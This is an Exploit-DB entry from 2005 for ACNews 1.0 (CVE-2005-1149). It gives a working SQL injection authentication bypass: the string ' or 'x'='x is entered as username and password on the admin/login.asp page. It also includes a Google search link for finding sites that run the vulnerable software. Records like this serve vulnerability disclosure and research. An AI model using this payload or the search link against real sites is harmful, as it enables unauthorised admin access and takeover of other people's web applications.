ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit

2005-04-09T00:00:00
ID EDB-ID:925
Type exploitdb
Reporter LaMeR
Modified 2005-04-09T00:00:00

Description

ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit. CVE-2005-1149. Webapps exploit for asp platform

                                        
                                            # http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
# /str0ke

Product:ACNews
version :1.0
VULNERABILITY CLASS: SQL injection

[exploit]
Log in with
username:' or 'x'='x
password :' or 'x'='x
from admin/login.asp page.

greetz to HaXoR & LOverboy

auther : LaMeR

securitygurus team

# milw0rm.com [2005-04-09]